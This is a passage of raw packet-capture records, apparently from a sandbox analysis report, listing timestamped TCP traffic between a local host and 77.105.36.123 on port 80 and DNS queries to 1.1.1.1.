                                                                                                                                                Nov 11, 2024 19:16:51.254044056 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.254085064 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.254125118 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.257814884 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.285537004 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.285578012 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.285598040 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.285605907 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.285653114 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.309577942 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309633970 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309648991 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309726000 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.309775114 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309788942 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309802055 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309813976 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.309814930 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.309856892 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334103107 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334120989 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334141970 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334155083 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334167957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334181070 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334193945 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334259987 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334309101 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334378958 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334392071 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334403992 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334424973 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334513903 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334525108 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334549904 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334646940 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334656954 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334673882 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334688902 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334692955 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334701061 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334707975 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.334716082 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.334738016 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335033894 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335051060 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335082054 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335155964 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335167885 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335206985 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335207939 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335246086 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335269928 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335273981 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335287094 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335299015 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335310936 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335326910 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335330963 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335341930 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335349083 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335370064 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.335947990 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335959911 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335971117 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.335995913 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336009026 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336093903 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336106062 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336116076 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336127996 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336146116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336148024 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336158037 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336164951 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336169958 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336182117 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336194038 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336205006 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336208105 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336225033 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336237907 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.336246967 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336256981 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.336289883 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.337789059 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337801933 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337812901 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337825060 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337833881 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.337836981 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337851048 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337857962 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.337862968 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337874889 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337886095 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337898016 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337908983 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.337919950 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337933064 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337943077 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337944984 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.337954998 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337968111 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337974072 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.337980032 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.337991953 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338001966 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338006020 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.338015079 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338021040 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338027000 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338032961 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338043928 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338054895 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338063002 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.338076115 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.338098049 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.338942051 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338956118 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338965893 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338977098 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338988066 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.338999033 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339001894 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.339011908 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339023113 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339035034 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339046001 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339052916 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.339057922 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339066982 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.339071035 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339082956 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339106083 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.339118004 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.339900017 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339912891 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339924097 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339936018 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339947939 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339951038 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.339960098 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339971066 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339983940 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.339983940 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.339996099 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340008020 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340013981 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.340020895 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340033054 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340035915 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.340059996 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.340861082 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340874910 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340886116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340898037 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340912104 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.340913057 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340926886 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340929985 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.340939045 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340951920 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340962887 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340969086 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.340974092 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340980053 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.340986967 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.340997934 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341001987 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.341042042 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.341820955 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341834068 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341845036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341856956 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341866970 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.341875076 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341888905 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341900110 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.341901064 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341914892 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341926098 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341931105 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.341938019 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341949940 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341960907 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341970921 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.341969967 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.341969967 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.342008114 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.342031002 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.342639923 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342653036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342663050 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342677116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342688084 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342694044 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.342700005 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342713118 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342724085 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342725992 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.342736006 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342747927 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342751980 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.342760086 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342762947 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.342772007 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342782974 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342792034 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.342794895 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342807055 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342817068 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342828035 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.342830896 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.342840910 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.342873096 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.343626976 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343638897 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343650103 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343661070 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343667030 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.343672991 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343684912 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343697071 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343707085 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.343708038 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343720913 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343733072 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343744040 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343750000 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.343756914 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343760967 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.343769073 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343780994 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343785048 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.343791962 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343801022 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.343806028 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.343842030 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.344476938 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.344489098 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.344502926 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.344521046 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.344526052 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.344535112 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.344547033 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.344554901 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.344575882 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345006943 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345019102 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345029116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345041990 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345052004 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345057011 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345063925 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345076084 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345087051 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345088005 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345098972 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345098972 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345112085 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345118999 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345124006 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345136881 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345148087 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345155954 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345160961 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345174074 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345185995 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345191002 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345227957 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345825911 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345839977 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345880985 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345885992 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345899105 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345910072 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345920086 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345921040 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345937967 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.345958948 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.345993042 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.375179052 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:56.345221996 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:56.349191904 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:59.864049911 CET4973380192.168.2.477.105.36.123

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 11, 2024 19:16:46.842540026 CET5790353192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:16:46.865551949 CET53579031.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.402046919 CET5125653192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:16:49.408278942 CET5125653192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:16:50.127655983 CET53512561.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.128180027 CET53512561.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:17:32.100327015 CET6416853192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:17:32.110287905 CET53641681.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:17:51.847595930 CET5716253192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:17:52.182626963 CET53571621.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:18:12.175898075 CET6068153192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:18:12.199220896 CET53606811.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:18:33.207046986 CET6433353192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:18:33.230485916 CET53643331.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:18:54.100953102 CET5756653192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:18:54.124774933 CET53575661.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:19:15.288335085 CET5551053192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:19:15.312720060 CET53555101.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:19:36.452917099 CET5565753192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:19:36.462101936 CET53556571.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:19:57.148802996 CET6064453192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:19:57.171341896 CET53606441.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:20:18.804894924 CET6173753192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:20:18.824526072 CET53617371.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:20:40.208863974 CET5792753192.168.2.41.1.1.1
